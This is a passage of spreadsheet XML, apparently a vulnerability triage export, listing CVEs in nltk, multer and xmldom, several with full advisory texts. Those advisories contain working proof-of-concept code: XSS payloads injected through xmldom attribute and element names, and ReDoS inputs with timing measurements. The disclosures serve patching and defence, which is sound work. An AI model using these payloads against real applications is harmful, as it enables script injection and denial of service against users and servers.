t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="1608"><c r="A1608" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1608" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D1608" s="5" t="inlineStr" /><c r="E1608" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1608" s="5" t="inlineStr" /><c r="H1608" s="5" t="n"><v>0.012</v></c><c r="I1608" s="5" t="inlineStr" /><c r="J1608" s="5" t="inlineStr" /><c r="K1608" s="5" t="inlineStr" /><c r="L1608" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1608" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1608" s="5" t="inlineStr" /><c r="R1608" s="5" t="inlineStr" /><c r="S1608" s="5" t="inlineStr"><is><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is></c><c r="T1608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="1609"><c r="A1609" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1609" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D1609" s="5" t="inlineStr" /><c r="E1609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1609" s="5" t="inlineStr" /><c r="H1609" s="5" t="n"><v>0.002</v></c><c r="I1609" s="5" t="inlineStr" /><c r="J1609" s="5" t="inlineStr" /><c r="K1609" s="5" t="inlineStr" /><c r="L1609" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1609" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1609" s="5" t="inlineStr" /><c r="R1609" s="5" t="inlineStr" /><c r="S1609" s="5" t="inlineStr"><is><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is></c><c r="T1609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="1610"><c r="A1610" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1610" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D1610" s="5" t="inlineStr" /><c r="E1610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1610" s="5" t="inlineStr" /><c r="H1610" s="5" t="n"><v>0.003</v></c><c r="I1610" s="5" t="inlineStr" /><c r="J1610" s="5" t="inlineStr" /><c r="K1610" s="5" t="inlineStr" /><c r="L1610" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1610" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1610" s="5" t="inlineStr" /><c r="R1610" s="5" t="inlineStr" /><c r="S1610" s="5" t="inlineStr"><is><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is></c><c r="T1610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="1611"><c r="A1611" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1611" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D1611" s="5" t="inlineStr" /><c r="E1611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1611" s="5" t="inlineStr" /><c r="H1611" s="5" t="n"><v>0.005</v></c><c r="I1611" s="5" t="inlineStr" /><c r="J1611" s="5" t="inlineStr" /><c r="K1611" s="5" t="inlineStr" /><c r="L1611" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1611" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1611" s="5" t="inlineStr" /><c r="R1611" s="5" t="inlineStr" /><c r="S1611" s="5" t="inlineStr"><is><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is></c><c r="T1611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="1612"><c r="A1612" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1612" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D1612" s="5" t="inlineStr" /><c r="E1612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1612" s="5" t="inlineStr" /><c r="H1612" s="5" t="n"><v>0.003</v></c><c r="I1612" s="5" t="inlineStr" /><c r="J1612" s="5" t="inlineStr" /><c r="K1612" s="5" t="inlineStr" /><c r="L1612" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1612" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1612" s="5" t="inlineStr" /><c r="R1612" s="5" t="inlineStr" /><c r="S1612" s="5" t="inlineStr"><is><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is></c><c r="T1612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="1613"><c r="A1613" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1613" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D1613" s="5" t="inlineStr" /><c r="E1613" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1613" s="5" t="inlineStr" /><c r="H1613" s="5" t="n"><v>0.002</v></c><c r="I1613" s="5" t="inlineStr" /><c r="J1613" s="5" t="inlineStr" /><c r="K1613" s="5" t="inlineStr" /><c r="L1613" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1613" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1613" s="5" t="inlineStr" /><c r="R1613" s="5" t="inlineStr" /><c r="S1613" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="T1613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="1614"><c r="A1614" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1614" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D1614" s="5" t="inlineStr" /><c r="E1614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1614" s="5" t="inlineStr" /><c r="H1614" s="5" t="n"><v>0.003</v></c><c r="I1614" s="5" t="inlineStr" /><c r="J1614" s="5" t="inlineStr" /><c r="K1614" s="5" t="inlineStr" /><c r="L1614" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1614" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1614" s="5" t="inlineStr" /><c r="R1614" s="5" t="inlineStr" /><c r="S1614" s="5" t="inlineStr"><is><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is></c><c r="T1614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="1615"><c r="A1615" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1615" s="5" t="inlineStr"><is><t>CVE-2026-82514</t></is></c><c r="D1615" s="5" t="inlineStr" /><c r="E1615" s="5" t="inlineStr" /><c r="F1615" s="5" t="inlineStr" /><c r="G1615" s="5" t="inlineStr" /><c r="H1615" s="5" t="inlineStr" /><c r="I1615" s="5" t="inlineStr" /><c r="J1615" s="5" t="inlineStr" /><c r="K1615" s="5" t="inlineStr" /><c r="L1615" s="5" t="inlineStr" /><c r="M1615" s="5" t="inlineStr" /><c r="N1615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1615" s="5" t="inlineStr" /><c r="R1615" s="5" t="inlineStr" /><c r="S1615" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82514</t></is></c></row><row r="1616"><c r="A1616" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1616" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D1616" s="5" t="inlineStr" /><c r="E1616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1616" s="5" t="inlineStr" /><c r="H1616" s="5" t="n"><v>0.003</v></c><c r="I1616" s="5" t="inlineStr" /><c r="J1616" s="5" t="inlineStr" /><c r="K1616" s="5" t="inlineStr" /><c r="L1616" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1616" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1616" s="5" t="inlineStr" /><c r="R1616" s="5" t="inlineStr" /><c r="S1616" s="5" t="inlineStr"><is><t>## Summary

`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.

## Details

`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.

The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:

- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).

The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.

### Root Cause

1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Demonstrating the validation gap

```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}

// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```

## Impact

Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="1617"><c r="A1617" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1617" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D1617" s="5" t="inlineStr" /><c r="E1617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1617" s="5" t="inlineStr" /><c r="H1617" s="5" t="n"><v>0.003</v></c><c r="I1617" s="5" t="inlineStr" /><c r="J1617" s="5" t="inlineStr" /><c r="K1617" s="5" t="inlineStr" /><c r="L1617" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1617" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1617" s="5" t="inlineStr" /><c r="R1617" s="5" t="inlineStr" /><c r="S1617" s="5" t="inlineStr"><is><t>## Summary

`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).

## Details

The PI production in `lib/grammar.js` compiles (flags `mu`) to:

```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```

- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261

In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.

The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:

- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879

## Affected Versions

Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.

The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)

| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):

| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.

## Fix Applied

Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).

PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:

```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```

The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.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1617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="1618"><c r="A1618" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1618" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D1618" s="5" t="inlineStr" /><c r="E1618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1618" s="5" t="inlineStr" /><c r="H1618" s="5" t="n"><v>0.003</v></c><c r="I1618" s="5" t="inlineStr" /><c r="J1618" s="5" t="inlineStr" /><c r="K1618" s="5" t="inlineStr" /><c r="L1618" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1618" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1618" s="5" t="inlineStr" /><c r="R1618" s="5" t="inlineStr" /><c r="S1618" s="5" t="inlineStr"><is><t>## Summary

`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.

An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.

## Details

`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.

The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.

### Root Cause

1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```

## Impact

Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="1619"><c r="A1619" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1619" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D1619" s="5" t="inlineStr" /><c r="E1619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1619" s="5" t="inlineStr" /><c r="H1619" s="5" t="n"><v>0.003</v></c><c r="I1619" s="5" t="inlineStr" /><c r="J1619" s="5" t="inlineStr" /><c r="K1619" s="5" t="inlineStr" /><c r="L1619" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1619" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1619" s="5" t="inlineStr" /><c r="R1619" s="5" t="inlineStr" /><c r="S1619" s="5" t="inlineStr"><is><t>## Summary

The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.

Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.

## Details

The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
